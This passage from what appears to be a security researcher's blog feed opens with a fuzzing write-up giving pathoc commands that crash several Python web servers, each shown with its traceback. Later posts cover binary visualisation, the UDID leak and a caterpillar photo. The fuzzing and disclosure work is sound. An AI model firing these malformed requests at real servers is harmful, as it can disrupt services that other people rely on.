argue that the\nmajority of security problems fall in this category. It's interesting to ponder\nwhy this type of issue is so ubiquitous in Python servers. I have no doubt that\npart the answer lies in Python's use of exceptions - errors that would be\nexplicit in other languages can be implicit in Python, and code that seems clean\nand intuitive might in fact be buggy. I think this is especially relevant right\nnow, given the recent flurry of discussion surrounding the <a rel=\"external\" href=\"http:\/\/golang.org\/\">Go\nlanguage<\/a> and its error handling. It's pretty instructive to\nread Russ Cox's <a rel=\"external\" href=\"https:\/\/plus.google.com\/116810148281701144465\/posts\/iqAiKAwP6Ce\">recent\nriposte<\/a> to\n<a rel=\"external\" href=\"http:\/\/uberpython.wordpress.com\/2012\/09\/23\/why-im-not-leaving-python-for-go\/\">this\npost<\/a>\ncriticizing Go's explicit approach, while looking at the bugs below. <a rel=\"external\" href=\"https:\/\/github.com\/cortesi\">I love\nPython<\/a> and I think it's a fine language, but I also\nthink the designers of Go probably made the right choice.<\/p>\n<h2 id=\"basic-fuzzing-with-pathoc\">Basic fuzzing with pathoc<\/h2>\n<p>My methodology for these tests was very simple indeed. I launched each server in\nturn, and used pathod to fire corrupted GET requests at the daemon until I saw\nan error. I then looked at the logs, and boiled the distinct cases down to a\nminimal pathoc specification by hand. This exercises a rather shallow set of\nfeatures in the server software - mostly parsing of the HTTP lead-in and request\nheaders. It's possible to give software a much, much deeper workout with pathoc,\nbut I'll leave that for a future post.<\/p>\n<p>My pathoc fuzzing command looked something like this:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">pathoc<\/span><span style=\"color: #005CC5;\"> -n 1000 -p 8080 -t 1<\/span><span style=\"color: #032F62;\"> localhost &#39;get:\/:b@10:ir,&quot;\\x00&quot;&#39;<\/span><\/span><\/code><\/pre>\n<p>The most important flags here are <b>-n<\/b>, which tells pathoc to make 1000\nconsecutive requests, and <b>-t<\/b>, which tells pathoc to time out after one\nsecond (necessary to prevent hangs when daemons terminate improperly). The\nrequest specification itself breaks down as follows:<\/p>\n<table class=\"table\">\n    <tr>\n        <td>get<\/td>\n        <td>Issue a GET request<\/td>\n    <\/tr>\n    <tr>\n        <td>\/<\/td>\n        <td>... to the path \/ <\/td>\n    <\/tr>\n    <tr>\n        <td>b@10<\/td>\n        <td>... with a body consisting of 10 random bytes <\/td>\n    <\/tr>\n    <tr>\n        <td>ir,\"\\x00\"<\/td>\n        <td>... and inject a NULL byte at a random location.<\/td>\n    <\/tr>\n<\/table>\n<p>It's that last clause - the random injection - that makes the difference between\nsimply crafting requests and basic fuzzing. Every time a new request is issued,\nthe injection occurs at a different location. I varied the injected character\nbetween a NULL byte, a carriage return and a random alphabet letter. Each\nexposed different errors in different servers. For a complete description of the\nspecification language, see the <a rel=\"external\" href=\"http:\/\/pathod.net\/docs\/language\">online docs<\/a>.<\/p>\n<h2 id=\"results\">Results<\/h2>\n<p>For each bug, I've given a traceback and a minimal pathoc call to trigger the\nissue. The tracebacks have been edited lightly to shorten file paths and\nremove irrelevances like timestamps.<\/p>\n<h3 id=\"cherrypy\">CherryPy<\/h3>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">pathoc<\/span><span style=\"color: #005CC5;\"> -p 8080<\/span><span style=\"color: #032F62;\"> localhost &#39;get:\/:b@10:h&quot;Content-Length&quot;=&quot;x&quot;&#39;<\/span><\/span><\/code><\/pre><pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>ENGINE ValueError(&quot;invalid literal for int() with base 10: &#39;x&#39;&quot;,)<\/span><\/span>\n<span class=\"giallo-l\"><span>Traceback (most recent call last):<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;cherrypy\/wsgiserver\/wsgiserver2.py&quot;, line 1292, in communicate<\/span><\/span>\n<span class=\"giallo-l\"><span>    req.parse_request()<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;cherrypy\/wsgiserver\/wsgiserver2.py&quot;, line 591, in parse_request<\/span><\/span>\n<span class=\"giallo-l\"><span>    success = self.read_request_headers()<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;cherrypy\/wsgiserver\/wsgiserver2.py&quot;, line 711, in read_request_headers<\/span><\/span>\n<span class=\"giallo-l\"><span>    if mrbs and int(self.inheaders.get(&quot;Content-Length&quot;, 0)) &gt; mrbs:<\/span><\/span>\n<span class=\"giallo-l\"><span>ValueError: invalid literal for int() with base 10: &#39;x&#39;<\/span><\/span><\/code><\/pre><pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">pathoc<\/span><span style=\"color: #005CC5;\"> -p 8080<\/span><span style=\"color: #032F62;\"> localhost &#39;get:\/:i4,&quot;\\r&quot;<\/span><\/span><\/code><\/pre><pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>ENGINE TypeError(&quot;argument of type &#39;NoneType&#39; is not iterable&quot;,)<\/span><\/span>\n<span class=\"giallo-l\"><span>Traceback (most recent call last):<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;cherrypy\/wsgiserver\/wsgiserver2.py&quot;, line 1292, in communicate<\/span><\/span>\n<span class=\"giallo-l\"><span>    req.parse_request()<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;cherrypy\/wsgiserver\/wsgiserver2.py&quot;, line 580, in parse_request<\/span><\/span>\n<span class=\"giallo-l\"><span>    success = self.read_request_line()<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;cherrypy\/wsgiserver\/wsgiserver2.py&quot;, line 644, in read_request_line<\/span><\/span>\n<span class=\"giallo-l\"><span>    if NUMBER_SIGN in path:<\/span><\/span>\n<span class=\"giallo-l\"><span>TypeError: argument of type &#39;NoneType&#39; is not iterable<\/span><\/span><\/code><\/pre><h3 id=\"tornado\">Tornado<\/h3>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">pathoc<\/span><span style=\"color: #005CC5;\"> -p 8080<\/span><span style=\"color: #032F62;\"> localhost &#39;get:\/:b@10:h&quot;Content-Length&quot;=&quot;x&quot;&#39;<\/span><\/span><\/code><\/pre><pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>[E 120927 11:42:26 iostream:307] Uncaught exception, closing connection.<\/span><\/span>\n<span class=\"giallo-l\"><span>    Traceback (most recent call last):<\/span><\/span>\n<span class=\"giallo-l\"><span>      File &quot;tornado\/iostream.py&quot;, line 304, in wrapper<\/span><\/span>\n<span class=\"giallo-l\"><span>        callback(*args)<\/span><\/span>\n<span class=\"giallo-l\"><span>      File &quot;tornado\/httpserver.py&quot;, line 254, in _on_headers<\/span><\/span>\n<span class=\"giallo-l\"><span>        content_length = int(content_length)<\/span><\/span>\n<span class=\"giallo-l\"><span>    ValueError: invalid literal for int() with base 10: &#39;x&#39;<\/span><\/span>\n<span class=\"giallo-l\"><span>[E 120927 11:42:26 ioloop:435] Exception in callback &lt;tornado.stack_context._StackContextWrapper object at 0x1012e28e8&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    Traceback (most recent call last):<\/span><\/span>\n<span class=\"giallo-l\"><span>      File &quot;tornado\/ioloop.py&quot;, line 421, in _run_callback<\/span><\/span>\n<span class=\"giallo-l\"><span>        callback()<\/span><\/span>\n<span class=\"giallo-l\"><span>      File &quot;tornado\/iostream.py&quot;, line 304, in wrapper<\/span><\/span>\n<span class=\"giallo-l\"><span>        callback(*args)<\/span><\/span>\n<span class=\"giallo-l\"><span>      File &quot;tornado\/httpserver.py&quot;, line 254, in _on_headers<\/span><\/span>\n<span class=\"giallo-l\"><span>        content_length = int(content_length)<\/span><\/span>\n<span class=\"giallo-l\"><span>    ValueError: invalid literal for int() with base 10: &#39;x&#39;<\/span><\/span><\/code><\/pre><pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">pathoc<\/span><span style=\"color: #005CC5;\"> -p 8080<\/span><span style=\"color: #032F62;\"> localhost &#39;get:\/:h&quot;h\\r\\n&quot;=&quot;x&quot;&#39;<\/span><\/span><\/code><\/pre><pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>[E iostream:307] Uncaught exception, closing connection.<\/span><\/span>\n<span class=\"giallo-l\"><span>    Traceback (most recent call last):<\/span><\/span>\n<span class=\"giallo-l\"><span>      File &quot;tornado\/iostream.py&quot;, line 304, in wrapper<\/span><\/span>\n<span class=\"giallo-l\"><span>        callback(*args)<\/span><\/span>\n<span class=\"giallo-l\"><span>      File &quot;tornado\/httpserver.py&quot;, line 236, in _on_headers<\/span><\/span>\n<span class=\"giallo-l\"><span>        headers = httputil.HTTPHeaders.parse(data[eol:])<\/span><\/span>\n<span class=\"giallo-l\"><span>      File &quot;tornado\/httputil.py&quot;, line 127, in parse<\/span><\/span>\n<span class=\"giallo-l\"><span>        h.parse_line(line)<\/span><\/span>\n<span class=\"giallo-l\"><span>      File &quot;tornado\/httputil.py&quot;, line 113, in parse_line<\/span><\/span>\n<span class=\"giallo-l\"><span>        name, value = line.split(&quot;:&quot;, 1)<\/span><\/span>\n<span class=\"giallo-l\"><span>    ValueError: need more than 1 value to unpack<\/span><\/span>\n<span class=\"giallo-l\"><span>[E ioloop:435] Exception in callback &lt;tornado.stack_context._StackContextWrapper object at 0x1012bd7e0&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    Traceback (most recent call last):<\/span><\/span>\n<span class=\"giallo-l\"><span>      File &quot;tornado\/ioloop.py&quot;, line 421, in _run_callback<\/span><\/span>\n<span class=\"giallo-l\"><span>        callback()<\/span><\/span>\n<span class=\"giallo-l\"><span>      File &quot;tornado\/iostream.py&quot;, line 304, in wrapper<\/span><\/span>\n<span class=\"giallo-l\"><span>        callback(*args)<\/span><\/span>\n<span class=\"giallo-l\"><span>      File &quot;tornado\/httpserver.py&quot;, line 236, in _on_headers<\/span><\/span>\n<span class=\"giallo-l\"><span>        headers = httputil.HTTPHeaders.parse(data[eol:])<\/span><\/span>\n<span class=\"giallo-l\"><span>      File &quot;tornado\/httputil.py&quot;, line 127, in parse<\/span><\/span>\n<span class=\"giallo-l\"><span>        h.parse_line(line)<\/span><\/span>\n<span class=\"giallo-l\"><span>      File &quot;tornado\/httputil.py&quot;, line 113, in parse_line<\/span><\/span>\n<span class=\"giallo-l\"><span>        name, value = line.split(&quot;:&quot;, 1)<\/span><\/span>\n<span class=\"giallo-l\"><span>    ValueError: need more than 1 value to unpack<\/span><\/span><\/code><\/pre><h2 id=\"twisted\">Twisted<\/h2>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">pathoc<\/span><span style=\"color: #005CC5;\"> -p 8080<\/span><span style=\"color: #032F62;\"> localhost &#39;get:\/:b@10:h&quot;Content-Length&quot;=&quot;x&quot;&#39;<\/span><\/span><\/code><\/pre><pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>[HTTPChannel,4,127.0.0.1] Unhandled Error<\/span><\/span>\n<span class=\"giallo-l\"><span>  Traceback (most recent call last):<\/span><\/span>\n<span class=\"giallo-l\"><span>    File &quot;twisted\/python\/log.py&quot;, line 84, in callWithLogger<\/span><\/span>\n<span class=\"giallo-l\"><span>      return callWithContext({&quot;system&quot;: lp}, func, *args, **kw)<\/span><\/span>\n<span class=\"giallo-l\"><span>    File &quot;twisted\/python\/log.py&quot;, line 69, in callWithContext<\/span><\/span>\n<span class=\"giallo-l\"><span>      return context.call({ILogContext: newCtx}, func, *args, **kw)<\/span><\/span>\n<span class=\"giallo-l\"><span>    File &quot;twisted\/python\/context.py&quot;, line 118, in callWithContext<\/span><\/span>\n<span class=\"giallo-l\"><span>      return self.currentContext().callWithContext(ctx, func, *args, **kw)<\/span><\/span>\n<span class=\"giallo-l\"><span>    File &quot;twisted\/python\/context.py&quot;, line 81, in callWithContext<\/span><\/span>\n<span class=\"giallo-l\"><span>      return func(*args,**kw)<\/span><\/span>\n<span class=\"giallo-l\"><span>  --- &lt;exception caught here&gt; ---<\/span><\/span>\n<span class=\"giallo-l\"><span>    File &quot;twisted\/internet\/selectreactor.py&quot;, line 150, in _doReadOrWrite<\/span><\/span>\n<span class=\"giallo-l\"><span>      why = getattr(selectable, method)()<\/span><\/span>\n<span class=\"giallo-l\"><span>    File &quot;twisted\/internet\/tcp.py&quot;, line 199, in doRead<\/span><\/span>\n<span class=\"giallo-l\"><span>      rval = self.protocol.dataReceived(data)<\/span><\/span>\n<span class=\"giallo-l\"><span>    File &quot;twisted\/protocols\/basic.py&quot;, line 564, in dataReceived<\/span><\/span>\n<span class=\"giallo-l\"><span>      why = self.lineReceived(line)<\/span><\/span>\n<span class=\"giallo-l\"><span>    File &quot;twisted\/web\/http.py&quot;, line 1558, in lineReceived<\/span><\/span>\n<span class=\"giallo-l\"><span>      self.headerReceived(self.__header)<\/span><\/span>\n<span class=\"giallo-l\"><span>    File &quot;twisted\/web\/http.py&quot;, line 1580, in headerReceived<\/span><\/span>\n<span class=\"giallo-l\"><span>      self.length = int(data)<\/span><\/span>\n<span class=\"giallo-l\"><span>  exceptions.ValueError: invalid literal for int() with base 10: &#39;x&#39;<\/span><\/span><\/code><\/pre><h2 id=\"simplehttp\">SimpleHTTP<\/h2>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">pathoc<\/span><span style=\"color: #005CC5;\"> -p 8080<\/span><span style=\"color: #032F62;\"> localhost &#39;get:&quot;\/\\0&quot;&#39;<\/span><\/span><\/code><\/pre><pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>Exception happened during processing of request from (&#39;127.0.0.1&#39;, 54029)<\/span><\/span>\n<span class=\"giallo-l\"><span>Traceback (most recent call last):<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;lib\/python2.7\/SocketServer.py&quot;, line 284, in _handle_request_noblock<\/span><\/span>\n<span class=\"giallo-l\"><span>    self.process_request(request, client_address)<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;lib\/python2.7\/SocketServer.py&quot;, line 310, in process_request<\/span><\/span>\n<span class=\"giallo-l\"><span>    self.finish_request(request, client_address)<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;lib\/python2.7\/SocketServer.py&quot;, line 323, in finish_request<\/span><\/span>\n<span class=\"giallo-l\"><span>    self.RequestHandlerClass(request, client_address, self)<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;lib\/python2.7\/SocketServer.py&quot;, line 638, in __init__<\/span><\/span>\n<span class=\"giallo-l\"><span>    self.handle()<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;python2.7\/BaseHTTPServer.py&quot;, line 340, in handle<\/span><\/span>\n<span class=\"giallo-l\"><span>    self.handle_one_request()<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;lib\/python2.7\/BaseHTTPServer.py&quot;, line 328, in handle_one_request<\/span><\/span>\n<span class=\"giallo-l\"><span>    method()<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;lib\/python2.7\/SimpleHTTPServer.py&quot;, line 44, in do_GET<\/span><\/span>\n<span class=\"giallo-l\"><span>    f = self.send_head()<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;lib\/python2.7\/SimpleHTTPServer.py&quot;, line 68, in send_head<\/span><\/span>\n<span class=\"giallo-l\"><span>    if os.path.isdir(path):<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;lib\/python2.7\/genericpath.py&quot;, line 41, in isdir<\/span><\/span>\n<span class=\"giallo-l\"><span>    st = os.stat(s)<\/span><\/span>\n<span class=\"giallo-l\"><span>TypeError: must be encoded string without NULL bytes, not str<\/span><\/span><\/code><\/pre><h3 id=\"waitress\">Waitress<\/h3>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">pathoc<\/span><span style=\"color: #005CC5;\"> -p 8080<\/span><span style=\"color: #032F62;\"> localhost &#39;get:\/:i16,&quot; &quot;&#39;<\/span><\/span><\/code><\/pre><pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>ERROR:waitress:uncaptured python exception, closing channel<\/span><\/span>\n<span class=\"giallo-l\"><span>&lt;waitress.channel.HTTPChannel connected 127.0.0.1:62330 at 0x1007ca310&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>(<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;type &#39;exceptions.IndexError&#39;&gt;:list index out of range<\/span><\/span>\n<span class=\"giallo-l\"><span>        [lib\/python2.7\/asyncore.py|read|83]<\/span><\/span>\n<span class=\"giallo-l\"><span>        [lib\/python2.7\/asyncore.py|handle_read_event|444]<\/span><\/span>\n<span class=\"giallo-l\"><span>        [lib\/python2.7\/site-packages\/waitress\/channel.py|handle_read|169]<\/span><\/span>\n<span class=\"giallo-l\"><span>        [lib\/python2.7\/site-packages\/waitress\/channel.py|received|186]<\/span><\/span>\n<span class=\"giallo-l\"><span>        [lib\/python2.7\/site-packages\/waitress\/parser.py|received|99]<\/span><\/span>\n<span class=\"giallo-l\"><span>        [lib\/python2.7\/site-packages\/waitress\/parser.py|parse_header|158]<\/span><\/span>\n<span class=\"giallo-l\"><span>        [lib\/python2.7\/site-packages\/waitress\/parser.py|get_header_lines|247]<\/span><\/span>\n<span class=\"giallo-l\"><span>)<\/span><\/span><\/code><\/pre>\n<p><strong>Edit: The first version of this post had examples that were due to the test\nWSGI application, not waitress. I've replaced them with the traceback above,\nwhich has been reformatted for clarity.<\/strong><\/p>\n<h3 id=\"werkzeug\">Werkzeug<\/h3>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">pathoc<\/span><span style=\"color: #005CC5;\"> -p 8080<\/span><span style=\"color: #032F62;\"> localhost &#39;get:\/:h&quot;Host&quot;=&quot;n\\r\\0&quot;&#39;<\/span><\/span><\/code><\/pre><pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>Traceback (most recent call last):<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;flask\/app.py&quot;, line 1518, in __call__<\/span><\/span>\n<span class=\"giallo-l\"><span>    return self.wsgi_app(environ, start_response)<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;flask\/app.py&quot;, line 1507, in wsgi_app<\/span><\/span>\n<span class=\"giallo-l\"><span>    return response(environ, start_response)<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;\/usr\/local\/lib\/python2.7\/site-packages\/werkzeug\/wrappers.py&quot;, line 1082, in __call__<\/span><\/span>\n<span class=\"giallo-l\"><span>    app_iter, status, headers = self.get_wsgi_response(environ)<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;werkzeug\/wrappers.py&quot;, line 1070, in get_wsgi_response<\/span><\/span>\n<span class=\"giallo-l\"><span>    headers = self.get_wsgi_headers(environ)<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;werkzeug\/wrappers.py&quot;, line 986, in get_wsgi_headers<\/span><\/span>\n<span class=\"giallo-l\"><span>    headers[&#39;Location&#39;] = location<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;werkzeug\/datastructures.py&quot;, line 1132, in __setitem__<\/span><\/span>\n<span class=\"giallo-l\"><span>    self.set(key, value)<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;werkzeug\/datastructures.py&quot;, line 1097, in set<\/span><\/span>\n<span class=\"giallo-l\"><span>    self._validate_value(_value)<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;werkzeug\/datastructures.py&quot;, line 1065, in _validate_value<\/span><\/span>\n<span class=\"giallo-l\"><span>    raise ValueError(&#39;Detected newline in header value.  This is &#39;<\/span><\/span>\n<span class=\"giallo-l\"><span>ValueError: Detected newline in header value.  This is a potential security problem<\/span><\/span><\/code><\/pre>"},{"title":"Limits of data visualization with space filling curves","published":"2012-09-20T00:00:00+00:00","updated":"2012-09-20T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/visualisation\/hilbert-snake\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/visualisation\/hilbert-snake\/","content":"<p>I recently wrote a <a href=\"https:\/\/corte.si\/posts\/visualisation\/binvis\/\">series<\/a> of\n<a href=\"https:\/\/corte.si\/posts\/visualisation\/entropy\/\">posts<\/a> using the <a href=\"https:\/\/corte.si\/posts\/code\/hilbert\/portrait\/\">Hilbert\ncurve<\/a> to visualize binaries,\nculminating in a <a href=\"https:\/\/corte.si\/posts\/visualisation\/malware\/\">gallery showing regions of high entropy in\nmalware<\/a>.<\/p>\n<div class=\"media\">\n    <a href=\"..&#x2F;malware&#x2F;08b983ec55bfd50d1d2cb9a90b1ae54e.html\">\n        <img src=\"malwarexample.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>The fact that the Hilbert curve has excellent locality preservation means that\none dimensional features are preserved (as much as they can be) in the\ntwo-dimensional layout. This lets us visually pick out features of interest, and\nmakes it possible, for instance, to quickly identify different malware packers\njust based on their layout characteristics.<\/p>\n<p>An obvious next step is to ask if it's possible to extend this idea to let us\nvisually compare binaries, creating a sort of visual diff. Unfortunately, we now\nbump our heads against the limitations of space-filling curve visualization. I\nmade the animation below after a recent conversation along these lines, and I\nthink it illustrates the main issues nicely. It shows a single contiguous\nstretch of data (the black area) being shifted progressively through a binary.\nAt each timestep, the only thing that changes is the starting location of the\ndata block:<\/p>\n<div class=\"media\">\n    <a href=\"hilbertsnake.gif\">\n        <img src=\"hilbertsnake.gif\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>Two things are immediately clear:<\/p>\n<ul>\n<li>The block of data doesn't retain its\nshape at different offsets - identical stretches of data can look totally\ndifferent depending on their locations.<\/li>\n<li>There's no way to quickly see\n<em>where<\/em> in the binary a piece of information lies. Unless you are very familiar\nwith the particular curve and know its exact orientation, you can't say, for\ninstance, when the data block lies a third of the way through the binary.<\/li>\n<\/ul>\n<p>It's often worthwhile to trade off these things for locality preservation, but\nit definitely scotches certain use cases. I do wonder if it might be possible to\ntune the trade-off somewhat - sacrificing some locality preservation for better\nshape retention and offset estimation. I've toyed with some ideas along these\nlines (see the unrolled layouts in the <a href=\"https:\/\/corte.si\/posts\/visualisation\/binvis\/\">binary visualization\npost<\/a>), but I still don't have a\nsatisfying solution. If anyone out there knows of one, drop me a line.<\/p>\n"},{"title":"Findng the UDID leak: a guessing game","published":"2012-09-07T00:00:00+00:00","updated":"2012-09-07T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/security\/udid-leak-guessing\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/security\/udid-leak-guessing\/","content":"<p>It's become quite a popular parlor game to guess who is responsible for the\nrecent Antisec UDID leak. I've now seen no less than six separate apps named as\nthe probable source (two of which came from <a rel=\"external\" href=\"http:\/\/www.marco.org\">Marco\nArment<\/a>). Before we pick the next culprit, I think it's\nworth taking a step back to consider the list of things we <em>don't<\/em> know:<\/p>\n<ul>\n<li>We don't know that we're dealing with just one source. The Antisec dump may\nwell be an amalgam of data from various sources.<\/li>\n<li>We don't know that we're looking for just one app, or even a set of apps by\none developer. The leak may well come from one of the myriad of 3rd party services\nwhich could be included in thousands of apps.<\/li>\n<li>We don't know that Antisec is being truthful about the scale of the database,\nor the additional data they claim is associated with the UDID\/APNS records.<\/li>\n<li>We certainly don't know that the data was filched from an FBI laptop or that\nthe NCFTA was in any way involved.<\/li>\n<\/ul>\n<p>Given all of these unknowns, I think a simple process-of-elimination approach to\ntracking down the leak will probably be fruitless, or worse, result in the\nfinger being pointed at even more innocent parties. The one entity that may\nalready have the answer to this question is Apple. They have a list of a million\naffected UDIDs, and they presumably have records of all apps that have ever used\nthe associated push tokens. Given a large and precise sample like this, it\nshould be possible to find the origin(s) of the leak reasonably easily. Indeed,\nif Apple is on the ball they may already have done this.<\/p>\n<p>Now for some frank speculation of my own. Let's assume for a moment that Antisec\nhas been entirely truthful about the data, and that we're dealing with a single\nsource. In that case, we're looking for:<\/p>\n<ul>\n<li>... an app or third-party service integrated into multiple apps<\/li>\n<li>... with 12 million or more users<\/li>\n<li>... that is APNS-enabled<\/li>\n<li>... which also gathers user data like real names and zip codes.<\/li>\n<\/ul>\n<p>I'll throw my hat in the ring and say that my money is on a third-party service,\nnot a single app. If my hunch is right, the list of possible culprits is\nactually rather short.<\/p>\n"},{"title":"The UDID leak is a privacy catastrophe","published":"2012-09-04T00:00:00+00:00","updated":"2012-09-04T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/security\/udid-leak\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/security\/udid-leak\/","content":"<p>Something I've been worrying about for a long time has just happened: <a rel=\"external\" href=\"http:\/\/pastebin.com\/nfVT7b0Z\">Antisec\nhas leaked a database with more than a million\nUDIDs<\/a>. The UDID issue has been a bit of a white\nwhale of mine - I've written many blog posts about it and spent more hours than\nI care to think negotiating responsible disclosure with companies misusing\nUDIDs. Let's recap some of the posts I've written about this:<\/p>\n<ul>\n<li><a rel=\"external\" href=\"http:\/\/corte.si\/posts\/security\/openfeint-udid-deanonymization\/index.html\">In May 2011<\/a>,\njust before its sale to Gree was announced, I showed that\n<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/OpenFeint\">OpenFeint<\/a> was misusing UDIDs in a way\nthat allowed you to link a UDID to a user's identity, geolocation and Facebook\nand Twitter accounts. I didn't discuss it openly at the time, you could also\ncompletely take over an OpenFeint account, and access chat, forums, friends\nlists, and more using just a UDID. This resulted in a class-action lawsuit\nagainst OpenFeint, which has since petered out.<\/li>\n<li><a rel=\"external\" href=\"http:\/\/corte.si\/posts\/security\/apple-udid-survey\/index.html\">Later that month<\/a>, I\npublished a survey looking at how UDIDs are used in practice.\nThe data is now slightly out of date, but shows just how widely UDIDs are used and misused.<\/li>\n<li><a rel=\"external\" href=\"http:\/\/corte.si\/posts\/security\/udid-must-die\/index.html\">In September 2011<\/a>,\nI published the most troubling news so far, which\nparadoxically also got the least coverage in the press. I looked at\n<em>all<\/em> the gaming social networks on IOS - basically OpenFeint and its\ncompetitors - and found catastrophic mismanagement by nearly everyone. The\nvulnerabilities ranged from de-anonymization, to takeover of the user's gaming\nsocial network account, to the ability to completely take over the user's\nFacebook and Twitter accounts using just a UDID.<\/li>\n<\/ul>\n<p>As serious these problems are, I'm afraid it's just the tip of the iceberg.\nNegotiating disclosure and trying to convince companies to fix their problems\nhas taken literally months of my time, so I've stopped publishing on this issue\nfor the moment. It's disheartening to say it, but some of the companies\nmentioned in my posts <em>still<\/em> have unfixed problems (they were all notified well\nin advance of any publication). I will also note ominously that I know of a\nnumber of similar vulnerabilities elsewhere in the IOS app ecosystem that I've\njust not had the time to pursue.<\/p>\n<p>When speaking to people about this, I've often been asked \"What's the worst\nthat can happen?\". My response was always that the worst case scenario would be\nif a large database of UDIDs leaked... and here we are.<\/p>\n"},{"title":"Defiler","published":"2012-08-26T00:00:00+00:00","updated":"2012-08-26T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/photos\/lymantriid\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/photos\/lymantriid\/","content":"<p>I've been living out of a bag for the last 3 weeks, working hard on a series of\nintense but fun audits. After running in high gear for a while I find that I\nneed a mental palate cleanser - something to help me refocus and stop me from\ngetting snowblind. I then grab my camera, strap on my macro rig, and walk out\nthe door to try to catch the local wildlife in the act. It's become a bit of a\ngame - the aim is to catch creatures in their natural setting and leave them\ncompletely undisturbed when I go, with no posing, prodding or other\ndisturbances. Getting a usable shot of a 5mm target sitting on a twig swaying in\nthe wind is a fun challenge.<\/p>\n<p>Today I find myself in Sydney, working in a part of the town that is shot\nthrough with unreasonably beautiful walking tracks. The place is also blessed\nwith a huge diversity of invertebrate life that makes my <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Dunedin\">adopted home\ntown<\/a> seem barren by comparison. I walked\nalong a nearby track until I found a quiet, leafy spot, geared up, and\nleopard-crawled through the underbrush. Not long after, I came face-to-face with\nthis imposing little chap sitting on the tip of a fern frond.<\/p>\n<div class=\"media\">\n    <a href=\".&#x2F;lymantriid2.jpg\">\n        <img src=\".&#x2F;lymantriid2.jpg\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>This is a <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Lymantriidae\">Lymantriid<\/a> caterpillar\nof some variety, probably one of the tussock moths native to Australia.\n\"Lymantria\" means \"defiler\" - some species of this family can cause huge damage\nto foliage, and are considered to be destructive pests. So much so, that when 